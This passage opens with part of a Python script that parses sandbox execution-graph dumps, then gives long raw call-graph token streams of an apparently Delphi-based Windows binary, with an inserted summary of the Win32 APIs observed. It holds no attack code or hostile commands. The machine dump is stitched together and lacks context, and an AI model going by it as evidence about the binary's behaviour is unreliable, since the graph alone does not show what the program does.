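HEX = re.compile(r"^[0-9A-Fa-f]{6,8}$")       # "40cd00" address, or a hex label
SUMMARY = re.compile(r"^\d+ API calls$")      # collapsed sub-graph, not an API name


def parse_graph(text):
    """Return ({node_id: {"addr": int, "label": [str]}}, [(src, dst), ...])."""
    tokens = text.split()
    nodes, edges = {}, []
    current = None          # node whose label words we are currently collecting
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            current = None  # an edge ends the label of the preceding node
            i += 1
            continue
        # A node starts with a decimal id followed by a hex address.
        if NODE_ID.match(tok) and i + 1 < len(tokens) and HEX.match(tokens[i + 1]):
            current = int(tok)
            nodes[current] = {"addr": int(tokens[i + 1], 16), "label": []}
            i += 2
            continue
        if current is not None:     # anything else is a label word of the open node
            nodes[current]["label"].append(tok)
        i += 1
    return nodes, edges


def api_names(node):
    """API names called at this node; summary nodes and hex labels yield none."""
    label = " ".join(node["label"])
    if SUMMARY.match(label):
        return set()
    return {t for t in node["label"] if not HEX.match(t)}


def roots(nodes, edges):
    """Node ids that never appear as an edge target (graph entry points)."""
    targets = {dst for _, dst in edges}
    return sorted(n for n in nodes if n not in targets)


def reachable_apis(nodes, edges, root):
    """Breadth-first walk from root, collecting every API name on the way."""
    succ = defaultdict(list)
    for src, dst in edges:
        succ[src].append(dst)
    seen, queue, apis = {root}, deque([root]), set()
    while queue:
        n = queue.popleft()
        if n in nodes:
            apis |= api_names(nodes[n])
        for dst in succ[n]:
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return apis


if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    print(f"{len(nodes)} nodes, {len(edges)} edges")
    for r in roots(nodes, edges):
        print(f"root {r} @ {nodes[r]['addr']:#x}: {sorted(reachable_apis(nodes, edges, r))}")
```

To use it on the whole graph, paste the complete execution_graph line into `SAMPLE` (or read it from a file); the `N API calls` summary nodes are deliberately reported as empty so that only APIs the sandbox actually names are attributed to a root, and the `Total number of Limit Nodes` figure above tells you how many sub-graphs were collapsed that way.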
                                                                                                                            execution_graph 49966 40cd00 49967 40cd12 49966->49967 49968 40cd0d 49966->49968 49970 406f48 CloseHandle 49968->49970 49970->49967 49971 492848 49972 49287c 49971->49972 49973 49287e 49972->49973 49974 492892 49972->49974 50117 446f9c 32 API calls 49973->50117 49977 4928ce 49974->49977 49978 4928a1 49974->49978 49976 492887 Sleep 50037 4928c9 49976->50037 49983 49290a 49977->49983 49984 4928dd 49977->49984 50107 446ff8 49978->50107 49982 4928b0 49985 4928b8 FindWindowA 49982->49985 49989 492919 49983->49989 49990 492960 49983->49990 49986 446ff8 32 API calls 49984->49986 50111 447278 49985->50111 49988 4928ea 49986->49988 49992 4928f2 FindWindowA 49988->49992 50118 446f9c 32 API calls 49989->50118 49996 4929bc 49990->49996 49997 49296f 49990->49997 49994 447278 19 API calls 49992->49994 49993 492925 50119 446f9c 32 API calls 49993->50119 50050 492905 49994->50050 50004 492a18 49996->50004 50005 4929cb 49996->50005 50122 446f9c 32 API calls 49997->50122 49999 492932 50120 446f9c 32 API calls 49999->50120 50000 49297b 50123 446f9c 32 API calls 50000->50123 50003 49293f 50121 446f9c 32 API calls 50003->50121 50015 492a52 50004->50015 50016 492a27 50004->50016 50127 446f9c 32 API calls 50005->50127 50006 492988 50124 446f9c 32 API calls 50006->50124 50010 49294a SendMessageA 50014 447278 19 API calls 50010->50014 50011 4929d7 50128 446f9c 32 API calls 50011->50128 50013 492995 50125 446f9c 32 API calls 50013->50125 50014->50050 50024 492a61 50015->50024 50025 492aa0 50015->50025 50019 446ff8 32 API calls 50016->50019 50017 4929e4 50129 446f9c 32 API calls 50017->50129 50022 492a34 50019->50022 50021 4929a0 PostMessageA 50126 4470d0 19 API calls 50021->50126 50029 492a3c RegisterClipboardFormatA 50022->50029 50023 4929f1 50130 446f9c 32 API calls 50023->50130 50132 446f9c 32 API calls 50024->50132 50033 492aaf 50025->50033 50039 492af4 
50025->50039 50030 447278 19 API calls 50029->50030 50030->50037 50031 4929fc SendNotifyMessageA 50131 4470d0 19 API calls 50031->50131 50032 492a6d 50133 446f9c 32 API calls 50032->50133 50135 446f9c 32 API calls 50033->50135 50157 403420 50037->50157 50038 492a7a 50134 446f9c 32 API calls 50038->50134 50044 492b48 50039->50044 50045 492b03 50039->50045 50040 492abb 50136 446f9c 32 API calls 50040->50136 50043 492a85 SendMessageA 50047 447278 19 API calls 50043->50047 50054 492baa 50044->50054 50055 492b57 50044->50055 50139 446f9c 32 API calls 50045->50139 50046 492ac8 50137 446f9c 32 API calls 50046->50137 50047->50050 50050->50037 50051 492b0f 50140 446f9c 32 API calls 50051->50140 50053 492ad3 PostMessageA 50138 4470d0 19 API calls 50053->50138 50062 492bb9 50054->50062 50063 492c31 50054->50063 50058 446ff8 32 API calls 50055->50058 50056 492b1c 50141 446f9c 32 API calls 50056->50141 50060 492b64 50058->50060 50143 42e394 SetErrorMode 50060->50143 50061 492b27 SendNotifyMessageA 50142 4470d0 19 API calls 50061->50142 50066 446ff8 32 API calls 50062->50066 50071 492c40 50063->50071 50072 492c66 50063->50072 50068 492bc8 50066->50068 50067 492b71 50069 492b87 GetLastError 50067->50069 50070 492b77 50067->50070 50146 446f9c 32 API calls 50068->50146 50073 447278 19 API calls 50069->50073 50074 447278 19 API calls 50070->50074 50151 446f9c 32 API calls 50071->50151 50081 492c98 50072->50081 50082 492c75 50072->50082 50075 492b85 50073->50075 50074->50075 50078 447278 19 API calls 50075->50078 50077 492c4a FreeLibrary 50152 4470d0 19 API calls 50077->50152 50078->50037 50090 492ca7 50081->50090 50096 492cdb 50081->50096 50086 446ff8 32 API calls 50082->50086 50083 492bdb GetProcAddress 50084 492c21 50083->50084 50085 492be7 50083->50085 50150 4470d0 19 API calls 50084->50150 50147 446f9c 32 API calls 50085->50147 50088 492c81 50086->50088 50094 492c89 CreateMutexA 50088->50094 50153 48ccc8 32 API calls 50090->50153 50091 492bf3 50148 446f9c 32 API calls 
50091->50148 50094->50037 50095 492c00 50099 447278 19 API calls 50095->50099 50096->50037 50155 48ccc8 32 API calls 50096->50155 50098 492cb3 50100 492cc4 OemToCharBuffA 50098->50100 50101 492c11 50099->50101 50154 48cce0 19 API calls 50100->50154 50149 4470d0 19 API calls 50101->50149 50104 492cf6 50105 492d07 CharToOemBuffA 50104->50105 50156 48cce0 19 API calls 50105->50156 50108 447000 50107->50108 50161 436078 50108->50161 50110 44701f 50110->49982 50112 447280 50111->50112 50274 4363e0 VariantClear 50112->50274 50114 4472a3 50115 4472ba 50114->50115 50275 408c0c 18 API calls 50114->50275 50115->50037 50117->49976 50118->49993 50119->49999 50120->50003 50121->50010 50122->50000 50123->50006 50124->50013 50125->50021 50126->50050 50127->50011 50128->50017 50129->50023 50130->50031 50131->50037 50132->50032 50133->50038 50134->50043 50135->50040 50136->50046 50137->50053 50138->50050 50139->50051 50140->50056 50141->50061 50142->50037 50276 403738 50143->50276 50146->50083 50147->50091 50148->50095 50149->50050 50150->50050 50151->50077 50152->50037 50153->50098 50154->50037 50155->50104 50156->50037 50159 403426 50157->50159 50158 40344b 50159->50158 50160 402660 4 API calls 50159->50160 50160->50159 50162 436084 50161->50162 50172 4360a6 50161->50172 50162->50172 50181 408c0c 18 API calls 50162->50181 50163 436129 50190 408c0c 18 API calls 50163->50190 50165 436111 50185 403494 50165->50185 50166 436105 50166->50110 50167 4360f9 50176 403510 18 API calls 50167->50176 50168 4360ed 50182 403510 50168->50182 50169 43611d 50189 4040e8 32 API calls 50169->50189 50172->50163 50172->50165 50172->50166 50172->50167 50172->50168 50172->50169 50175 43613a 50175->50110 50180 436102 50176->50180 50178 436126 50178->50110 50180->50110 50181->50172 50191 4034e0 50182->50191 50186 403498 50185->50186 50187 4034ba 50186->50187 50188 402660 4 API calls 50186->50188 50187->50110 50188->50187 50189->50178 50190->50175 50196 4034bc 50191->50196 50193 4034f0 50201 403400 
50193->50201 50197 4034c0 50196->50197 50198 4034dc 50196->50198 50205 402648 50197->50205 50198->50193 50202 403406 50201->50202 50203 40341f 50201->50203 50202->50203 50269 402660 50202->50269 50203->50110 50206 40264c 50205->50206 50209 402656 50205->50209 50211 402088 50206->50211 50207 402652 50207->50209 50222 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50207->50222 50209->50193 50212 40209c 50211->50212 50213 4020a1 50211->50213 50223 4019cc RtlInitializeCriticalSection 50212->50223 50215 4020c6 RtlEnterCriticalSection 50213->50215 50216 4020d0 50213->50216 50217 4020a5 50213->50217 50215->50216 50216->50217 50230 401f94 50216->50230 50217->50207 50220 4021f1 RtlLeaveCriticalSection 50221 4021fb 50220->50221 50221->50207 50222->50209 50224 4019f0 RtlEnterCriticalSection 50223->50224 50225 4019fa 50223->50225 50224->50225 50226 401a18 LocalAlloc 50225->50226 50227 401a32 50226->50227 50228 401a81 50227->50228 50229 401a77 RtlLeaveCriticalSection 50227->50229 50228->50213 50229->50228 50233 401fa4 50230->50233 50231 401fd0 50235 401ff4 50231->50235 50241 401db4 50231->50241 50233->50231 50233->50235 50236 401f0c 50233->50236 50235->50220 50235->50221 50245 40178c 50236->50245 50239 401f29 50239->50233 50242 401dd2 50241->50242 50243 401e02 50241->50243 50242->50235 50243->50242 50256 401d1c 50243->50256 50251 4017a8 50245->50251 50246 4014e4 LocalAlloc VirtualAlloc VirtualFree 50246->50251 50247 4017b2 50248 401678 VirtualAlloc 50247->50248 50252 4017be 50248->50252 50249 40180f 50249->50239 50255 401e80 9 API calls 50249->50255 50250 4013e0 LocalAlloc 50250->50251 50251->50246 50251->50247 50251->50249 50251->50250 50253 401803 50251->50253 50252->50249 50254 4015c0 VirtualFree 50253->50254 50254->50249 50255->50239 50257 401d2e 50256->50257 50258 401d51 50257->50258 50259 401d63 50257->50259 50260 401940 LocalAlloc VirtualFree VirtualFree 50258->50260 50261 401940 LocalAlloc VirtualFree VirtualFree 50259->50261 50262 401d61 50260->50262 
50261->50262 50263 401bf8 9 API calls 50262->50263 50268 401d79 50262->50268 50265 401d88 50263->50265 50264 401da2 50267 401454 LocalAlloc 50264->50267 50265->50264 50266 401c4c 9 API calls 50265->50266 50266->50264 50267->50268 50268->50242 50270 402664 50269->50270 50271 40266e 50269->50271 50270->50271 50273 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50270->50273 50271->50203 50273->50271 50274->50114 50275->50115 50277 40373c LoadLibraryA 50276->50277 50277->50067 54050 498ba8 54108 403344 54050->54108 54052 498bb6 54111 4056a0 54052->54111 54054 498bbb 54114 40631c GetModuleHandleA GetProcAddress 54054->54114 54058 498bc5 54122 40994c 54058->54122 54389 4032fc 54108->54389 54110 403349 GetModuleHandleA GetCommandLineA 54110->54052 54113 4056db 54111->54113 54390 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54111->54390 54113->54054 54115 406338 54114->54115 54116 40633f GetProcAddress 54114->54116 54115->54116 54117 406355 GetProcAddress 54116->54117 54118 40634e 54116->54118 54119 406364 SetProcessDEPPolicy 54117->54119 54120 406368 54117->54120 54118->54117 54119->54120 54121 4063c4 6F561CD0 54120->54121 54121->54058 54391 409024 54122->54391 54389->54110 54390->54113 54392 408cbc 19 API calls 54391->54392 54393 409035 54392->54393 54394 4085dc GetSystemDefaultLCID 54393->54394 54397 408612 54394->54397 54395 406dec 19 API calls 54395->54397 54396 408568 19 API calls 54396->54397 54397->54395 54397->54396 54398 403450 18 API calls 54397->54398 54402 408674 54397->54402 54398->54397 54399 406dec 19 API calls 54399->54402 54400 408568 19 API calls 54400->54402 54401 403450 18 API calls 54401->54402 54402->54399 54402->54400 54402->54401 54403 4086f7 54402->54403 54404 403420 4 API calls 54403->54404 54405 408711 54404->54405 54406 408720 GetSystemDefaultLCID 54405->54406 54463 408568 GetLocaleInfoA 54406->54463 54409 403450 18 API calls 54410 408760 54409->54410 54411 408568 19 API calls 54410->54411 54412 408775 54411->54412 54413 408568 
19 API calls 54412->54413 54414 408799 54413->54414 54469 4085b4 GetLocaleInfoA 54414->54469 54417 4085b4 GetLocaleInfoA 54418 4087c9 54417->54418 54419 408568 19 API calls 54418->54419 54420 4087e3 54419->54420 54421 4085b4 GetLocaleInfoA 54420->54421 54422 408800 54421->54422 54423 408568 19 API calls 54422->54423 54464 4085a1 54463->54464 54465 40858f 54463->54465 54467 403494 4 API calls 54464->54467 54466 4034e0 18 API calls 54465->54466 54468 40859f 54466->54468 54467->54468 54468->54409 54470 4085d0 54469->54470 54470->54417 55828 42f520 55829 42f52b 55828->55829 55830 42f52f NtdllDefWindowProc_A 55828->55830 55830->55829 50278 416b42 50279 416bea 50278->50279 50280 416b5a 50278->50280 50297 41531c 18 API calls 50279->50297 50282 416b74 SendMessageA 50280->50282 50283 416b68 50280->50283 50293 416bc8 50282->50293 50284 416b72 CallWindowProcA 50283->50284 50285 416b8e 50283->50285 50284->50293 50294 41a058 GetSysColor 50285->50294 50288 416b99 SetTextColor 50289 416bae 50288->50289 50295 41a058 GetSysColor 50289->50295 50291 416bb3 SetBkColor 50296 41a6e0 GetSysColor CreateBrushIndirect 50291->50296 50294->50288 50295->50291 50296->50293 50297->50293 55831 4358e0 55832 4358f5 55831->55832 55835 43590f 55832->55835 55837 4352c8 55832->55837 55844 435312 55837->55844 55847 4352f8 55837->55847 55838 403400 4 API calls 55839 435717 55838->55839 55839->55835 55850 435728 18 API calls 55839->55850 55840 446da4 18 API calls 55840->55847 55841 403744 18 API calls 55841->55847 55842 403450 18 API calls 55842->55847 55843 402648 18 API calls 55843->55847 55844->55838 55846 431ca0 18 API calls 55846->55847 55847->55840 55847->55841 55847->55842 55847->55843 55847->55844 55847->55846 55848 4038a4 18 API calls 55847->55848 55851 4343b0 55847->55851 55863 434b74 18 API calls 55847->55863 55848->55847 55850->55835 55852 43446d 55851->55852 55853 4343dd 55851->55853 55882 434310 18 API calls 55852->55882 55854 403494 4 API calls 55853->55854 55856 4343eb 55854->55856 55858 
403778 18 API calls 55856->55858 55857 43445f 55859 403400 4 API calls 55857->55859 55861 43440c 55858->55861 55860 4344bd 55859->55860 55860->55847 55861->55857 55864 494944 55861->55864 55863->55847 55865 49497c 55864->55865 55866 494a14 55864->55866 55868 403494 4 API calls 55865->55868 55883 448930 55866->55883 55871 494987 55868->55871 55869 494997 55870 403400 4 API calls 55869->55870 55872 494a38 55870->55872 55871->55869 55873 4037b8 18 API calls 55871->55873 55874 403400 4 API calls 55872->55874 55876 4949b0 55873->55876 55875 494a40 55874->55875 55875->55861 55876->55869 55877 4037b8 18 API calls 55876->55877 55878 4949d3 55877->55878 55879 403778 18 API calls 55878->55879 55880 494a04 55879->55880 55881 403634 18 API calls 55880->55881 55881->55866 55882->55857 55884 448955 55883->55884 55885 448998 55883->55885 55886 403494 4 API calls 55884->55886 55888 4489ac 55885->55888 55895 44852c 55885->55895 55887 448960 55886->55887 55892 4037b8 18 API calls 55887->55892 55890 403400 4 API calls 55888->55890 55891 4489df 55890->55891 55891->55869 55893 44897c 55892->55893 55894 4037b8 18 API calls 55893->55894 55894->55885 55896 403494 4 API calls 55895->55896 55897 448562 55896->55897 55898 4037b8 18 API calls 55897->55898 55899 448574 55898->55899 55900 403778 18 API calls 55899->55900 55901 448595 55900->55901 55902 4037b8 18 API calls 55901->55902 55903 4485ad 55902->55903 55904 403778 18 API calls 55903->55904 55905 4485d8 55904->55905 55906 4037b8 18 API calls 55905->55906 55916 4485f0 55906->55916 55907 448628 55909 403420 4 API calls 55907->55909 55908 4486c3 55912 4486cb GetProcAddress 55908->55912 55913 448708 55909->55913 55910 44864b LoadLibraryExA 55910->55916 55911 44865d LoadLibraryA 55911->55916 55914 4486de 55912->55914 55913->55888 55914->55907 55915 403b80 18 API calls 55915->55916 55916->55907 55916->55908 55916->55910 55916->55911 55916->55915 55917 403450 18 API calls 55916->55917 55919 43da88 18 API calls 55916->55919 55917->55916 
Execution Graph (flattened page residue: the interactive call-graph rendering was dumped as a stream of node ids, function addresses and "a->b" edge tokens, and is replaced here by a summary of what it contained).

Nodes in this slice carry function addresses in the 0x40xxxx range of the image; nodes marked "N API calls" are collapsed subgraphs. Win32 APIs visible on the labelled nodes: CreateWindowExA, SetPropA, SetWindowPos, GetMenuItemCount, GetMenuStringA, GetMenuState, GetMenu, SetMenu, GetClassInfoA, DestroyWindow, SetErrorMode, WriteFile, MessageBeep, SetCurrentDirectoryA, Wow64DisableWow64FsRedirection, SetLastError, Wow64RevertWow64FsRedirection, RemoveDirectoryA, MoveFileA, GetLastError, LocalAlloc, TlsSetValue, TlsGetValue, InterlockedExchange, IsWindowVisible, IsWindowEnabled, EnableWindow, SendMessageA, SetActiveWindow, GetActiveWindow, GetFocus, SetFocus, RegisterClassA, ShowWindow, GetWindowTextA, IsIconic, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, IsDBCSLeadByte, CharNextA, CharPrevA, GetFileAttributesA, GetDC, SelectObject, CreateFontIndirectA, LoadStringA, SystemParametersInfoA, GetSystemTimeAsFileTime, FileTimeToSystemTime, GetWindowLongA, GetSystemMetrics.

Worth a look when triaging: file-system operations bracketed by WOW64 redirection toggling (Wow64DisableWow64FsRedirection / Wow64RevertWow64FsRedirection with RemoveDirectoryA at 0x452e10, MoveFileA at 0x452cc1), registry reads (RegOpenKeyExA at 0x42de2d, RegQueryValueExA at 0x42dc26 and 0x42dca0, RegCloseKey at 0x455a5c), and WriteFile at 0x4413ab and 0x406f10.
41fbb7 53805->53806 53807 41fbcd 53806->53807 53808 41f93c 4 API calls 53806->53808 53815 41f93c 53807->53815 53808->53807 53810 41fc15 53811 41fc38 SetScrollInfo 53810->53811 53823 41fa9c 53811->53823 53814->53792 53816 4181e0 53815->53816 53817 41f959 GetWindowLongA 53816->53817 53818 41f996 53817->53818 53819 41f976 53817->53819 53835 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53818->53835 53834 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53819->53834 53822 41f982 53822->53810 53824 41faaa 53823->53824 53825 41fab2 53823->53825 53824->53794 53826 41faf1 53825->53826 53827 41fae1 53825->53827 53833 41faef 53825->53833 53837 417e48 IsWindowVisible ScrollWindow SetWindowPos 53826->53837 53836 417e48 IsWindowVisible ScrollWindow SetWindowPos 53827->53836 53828 41fb31 GetScrollPos 53828->53824 53831 41fb3c 53828->53831 53832 41fb4b SetScrollPos 53831->53832 53832->53824 53833->53828 53834->53822 53835->53822 53836->53833 53837->53833 53838 420598 53839 4205ab 53838->53839 53859 415b30 53839->53859 53841 4206f2 53842 420709 53841->53842 53866 4146d4 KiUserCallbackDispatcher 53841->53866 53846 420720 53842->53846 53867 414718 KiUserCallbackDispatcher 53842->53867 53843 420651 53864 420848 34 API calls 53843->53864 53844 4205e6 53844->53841 53844->53843 53852 420642 MulDiv 53844->53852 53848 420742 53846->53848 53868 420060 12 API calls 53846->53868 53850 42066a 53850->53841 53865 420060 12 API calls 53850->53865 53863 41a304 19 API calls 53852->53863 53855 420687 53856 4206a3 MulDiv 53855->53856 53857 4206c6 53855->53857 53856->53857 53857->53841 53858 4206cf MulDiv 53857->53858 53858->53841 53860 415b42 53859->53860 53869 414470 53860->53869 53862 415b5a 53862->53844 53863->53843 53864->53850 53865->53855 53866->53842 53867->53846 53868->53848 53870 41448a 53869->53870 53873 410458 53870->53873 53872 4144a0 53872->53862 53876 40dca4 53873->53876 53875 41045e 53875->53872 53877 40dd06 53876->53877 53880 40dcb7 53876->53880 53883 40dd14 
53877->53883 53881 40dd14 33 API calls 53880->53881 53882 40dce1 53881->53882 53882->53875 53884 40dd24 53883->53884 53886 40dd3a 53884->53886 53895 40e09c 53884->53895 53911 40d5e0 53884->53911 53914 40df4c 53886->53914 53889 40d5e0 19 API calls 53890 40dd42 53889->53890 53890->53889 53891 40ddae 53890->53891 53917 40db60 53890->53917 53893 40df4c 19 API calls 53891->53893 53894 40dd10 53893->53894 53894->53875 53931 40e96c 53895->53931 53897 403778 18 API calls 53899 40e0d7 53897->53899 53898 40e18d 53900 40e1b7 53898->53900 53901 40e1a8 53898->53901 53899->53897 53899->53898 53994 40d774 19 API calls 53899->53994 53995 40e080 19 API calls 53899->53995 53991 40ba24 53900->53991 53940 40e3c0 53901->53940 53907 40e1b5 53908 403400 4 API calls 53907->53908 53909 40e25c 53908->53909 53909->53884 53912 40ea08 19 API calls 53911->53912 53913 40d5ea 53912->53913 53913->53884 54028 40d4bc 53914->54028 54037 40df54 53917->54037 53920 40e96c 19 API calls 53921 40db9e 53920->53921 53922 40e96c 19 API calls 53921->53922 53923 40dba9 53922->53923 53924 40dbc4 53923->53924 53925 40dbbb 53923->53925 53930 40dbc1 53923->53930 54044 40d9d8 53924->54044 54047 40dac8 33 API calls 53925->54047 53928 403420 4 API calls 53929 40dc8f 53928->53929 53929->53890 53930->53928 53997 40d780 53931->53997 53934 4034e0 18 API calls 53935 40e98f 53934->53935 53936 403744 18 API calls 53935->53936 53937 40e996 53936->53937 53938 40d780 19 API calls 53937->53938 53939 40e9a4 53938->53939 53939->53899 53941 40e3ec 53940->53941 53943 40e3f6 53940->53943 54002 40d440 19 API calls 53941->54002 53944 40e511 53943->53944 53945 40e495 53943->53945 53946 40e4f6 53943->53946 53947 40e576 53943->53947 53948 40e438 53943->53948 53949 40e4d9 53943->53949 53950 40e47a 53943->53950 53951 40e4bb 53943->53951 53962 40e45c 53943->53962 53954 40d764 19 API calls 53944->53954 54010 40de24 19 API calls 53945->54010 54015 40e890 19 API calls 53946->54015 53958 40d764 19 API calls 53947->53958 54003 40d764 53948->54003 
54013 40e9a8 19 API calls 53949->54013 54009 40d818 19 API calls 53950->54009 54012 40dde4 19 API calls 53951->54012 53963 40e519 53954->53963 53957 403400 4 API calls 53964 40e5eb 53957->53964 53965 40e57e 53958->53965 53961 40e4a0 54011 40d470 19 API calls 53961->54011 53962->53957 53971 40e523 53963->53971 53972 40e51d 53963->53972 53964->53907 53973 40e582 53965->53973 53974 40e59b 53965->53974 53966 40e4e4 54014 409d38 18 API calls 53966->54014 53968 40e461 54008 40ded8 19 API calls 53968->54008 53969 40e444 54006 40de24 19 API calls 53969->54006 54016 40ea08 53971->54016 53979 40e521 53972->53979 53980 40e53c 53972->53980 53982 40ea08 19 API calls 53973->53982 54022 40de24 19 API calls 53974->54022 54020 40de24 19 API calls 53979->54020 53983 40ea08 19 API calls 53980->53983 53982->53962 53985 40e544 53983->53985 53984 40e44f 54007 40e26c 19 API calls 53984->54007 54019 40d8a0 19 API calls 53985->54019 53988 40e566 54021 40e2d4 18 API calls 53988->54021 54023 40b9d0 53991->54023 53994->53899 53995->53899 53996 40d774 19 API calls 53996->53907 54000 40d78b 53997->54000 53998 40d7c5 53998->53934 54000->53998 54001 40d7cc 19 API calls 54000->54001 54001->54000 54002->53943 54004 40ea08 19 API calls 54003->54004 54005 40d76e 54004->54005 54005->53968 54005->53969 54006->53984 54007->53962 54008->53962 54009->53962 54010->53961 54011->53962 54012->53962 54013->53966 54014->53962 54015->53962 54017 40d780 19 API calls 54016->54017 54018 40ea15 54017->54018 54018->53962 54019->53962 54020->53988 54021->53962 54022->53962 54024 40b9e2 54023->54024 54026 40ba07 54023->54026 54024->54026 54027 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54024->54027 54026->53907 54026->53996 54027->54026 54029 40ea08 19 API calls 54028->54029 54031 40d4c9 54029->54031 54030 40d4dc 54030->53890 54031->54030 54035 40eb0c 19 API calls 54031->54035 54033 40d4d7 54036 40d458 19 API calls 54033->54036 54035->54033 54036->54030 54038 40d764 19 API calls 54037->54038 54039 40df6b 
54038->54039 54040 40ea08 19 API calls 54039->54040 54043 40db93 54039->54043 54041 40df78 54040->54041 54041->54043 54048 40ded8 19 API calls 54041->54048 54043->53920 54049 40ab7c 33 API calls 54044->54049 54046 40da00 54046->53930 54047->53930 54048->54043 54049->54046 56252 40ce7c 56253 40ce84 56252->56253 56254 40ceae 56253->56254 56255 40ceb2 56253->56255 56256 40cea7 56253->56256 56258 40ceb6 56255->56258 56259 40cec8 56255->56259 56264 406288 GlobalHandle GlobalUnWire GlobalFree 56256->56264 56265 40625c GlobalAlloc GlobalFix 56258->56265 56266 40626c GlobalHandle GlobalUnWire GlobalReAlloc GlobalFix 56259->56266 56262 40cec4 56262->56254 56263 408cbc 19 API calls 56262->56263 56263->56254 56264->56254 56265->56262 56266->56262 56267 41363c SetWindowLongA GetWindowLongA 56268 413699 SetPropA SetPropA 56267->56268 56269 41367b GetWindowLongA 56267->56269 56274 41f39c 56268->56274 56269->56268 56270 41368a SetWindowLongA 56269->56270 56270->56268 56279 415270 56274->56279 56286 423c0c 56274->56286 56380 423a84 56274->56380 56275 4136e9 56280 41527d 56279->56280 56281 4152e3 56280->56281 56282 4152d8 56280->56282 56285 4152e1 56280->56285 56387 424b8c 13 API calls 56281->56387 56282->56285 56388 41505c 60 API calls 56282->56388 56285->56275 56289 423c42 56286->56289 56303 423c63 56289->56303 56389 423b68 56289->56389 56290 423cec 56292 423cf3 56290->56292 56293 423d27 56290->56293 56291 423c8d 56294 423c93 56291->56294 56295 423d50 56291->56295 56298 423cf9 56292->56298 56338 423fb1 56292->56338 56301 423d32 56293->56301 56302 42409a IsIconic 56293->56302 56299 423cc5 56294->56299 56300 423c98 56294->56300 56296 423d62 56295->56296 56297 423d6b 56295->56297 56304 423d78 56296->56304 56305 423d69 56296->56305 56396 424194 11 API calls 56297->56396 56307 423f13 SendMessageA 56298->56307 56308 423d07 56298->56308 56299->56303 56329 423cde 56299->56329 56330 423e3f 56299->56330 56310 423df6 56300->56310 56311 423c9e 56300->56311 56312 4240d6 56301->56312 56313 
423d3b 56301->56313 56302->56303 56309 4240ae GetFocus 56302->56309 56303->56275 56315 4241dc 11 API calls 56304->56315 56397 423b84 NtdllDefWindowProc_A 56305->56397 56307->56303 56308->56303 56339 423cc0 56308->56339 56359 423f56 56308->56359 56309->56303 56316 4240bf 56309->56316 56401 423b84 NtdllDefWindowProc_A 56310->56401 56317 423ca7 56311->56317 56318 423e1e PostMessageA 56311->56318 56410 424850 WinHelpA PostMessageA 56312->56410 56314 4240ed 56313->56314 56313->56339 56327 4240f6 56314->56327 56328 42410b 56314->56328 56315->56303 56409 41eff4 GetCurrentThreadId EnumThreadWindows 56316->56409 56324 423cb0 56317->56324 56325 423ea5 56317->56325 56402 423b84 NtdllDefWindowProc_A 56318->56402 56333 423cb9 56324->56333 56334 423dce IsIconic 56324->56334 56335 423eae 56325->56335 56336 423edf 56325->56336 56326 423e39 56326->56303 56337 4244d4 19 API calls 56327->56337 56411 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56328->56411 56329->56339 56340 423e0b 56329->56340 56393 423b84 NtdllDefWindowProc_A 56330->56393 56332 4240c6 56332->56303 56344 4240ce SetFocus 56332->56344 56333->56339 56345 423d91 56333->56345 56347 423dea 56334->56347 56348 423dde 56334->56348 56404 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56335->56404 56394 423b84 NtdllDefWindowProc_A 56336->56394 56337->56303 56338->56303 56354 423fd7 IsWindowEnabled 56338->56354 56339->56303 56395 423b84 NtdllDefWindowProc_A 56339->56395 56342 424178 26 API calls 56340->56342 56342->56303 56343 423e45 56351 423e83 56343->56351 56352 423e61 56343->56352 56344->56303 56345->56303 56398 422c4c ShowWindow PostMessageA PostQuitMessage 56345->56398 56400 423b84 NtdllDefWindowProc_A 56347->56400 56399 423bc0 29 API calls 56348->56399 56360 423a84 6 API calls 56351->56360 56403 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56352->56403 56353 423eb6 56362 423ec8 56353->56362 56369 41ef58 6 API calls 56353->56369 56354->56303 56363 423fe5 
56354->56363 56357 423ee5 56364 423efd 56357->56364 56371 41eea4 2 API calls 56357->56371 56359->56303 56367 423f78 IsWindowEnabled 56359->56367 56368 423e8b PostMessageA 56360->56368 56405 423b84 NtdllDefWindowProc_A 56362->56405 56373 423fec IsWindowVisible 56363->56373 56365 423a84 6 API calls 56364->56365 56365->56303 56366 423e69 PostMessageA 56366->56303 56367->56303 56372 423f86 56367->56372 56368->56303 56369->56362 56371->56364 56406 412310 21 API calls 56372->56406 56373->56303 56375 423ffa GetFocus 56373->56375 56376 4181e0 56375->56376 56377 42400f SetFocus 56376->56377 56407 415240 56377->56407 56381 423b0d 56380->56381 56382 423a94 56380->56382 56381->56275 56382->56381 56383 423a9a EnumWindows 56382->56383 56383->56381 56384 423ab6 GetWindow GetWindowLongA 56383->56384 56412 423a1c GetWindow 56383->56412 56385 423ad5 56384->56385 56385->56381 56386 423b01 SetWindowPos 56385->56386 56386->56381 56386->56385 56387->56285 56388->56285 56390 423b72 56389->56390 56391 423b7d 56389->56391 56390->56391 56392 408720 21 API calls 56390->56392 56391->56290 56391->56291 56392->56391 56393->56343 56394->56357 56395->56303 56396->56303 56397->56303 56398->56303 56399->56303 56400->56303 56401->56303 56402->56326 56403->56366 56404->56353 56405->56303 56406->56303 56408 41525b SetFocus 56407->56408 56408->56303 56409->56332 56410->56326 56411->56326 56413 423a3d GetWindowLongA 56412->56413 56414 423a49 56412->56414 56413->56414 56415 4809f7 56416 480a00 56415->56416 56418 480a2b 56415->56418 56417 480a1d 56416->56417 56416->56418 56787 476c50 203 API calls 56417->56787 56419 480a6a 56418->56419 56789 47f4a4 18 API calls 56418->56789 56420 480a8e 56419->56420 56423 480a81 56419->56423 56424 480a83 56419->56424 56429 480aca 56420->56429 56430 480aac 56420->56430 56433 47f4e8 56 API calls 56423->56433 56791 47f57c 56 API calls 56424->56791 56425 480a22 56425->56418 56788 408be0 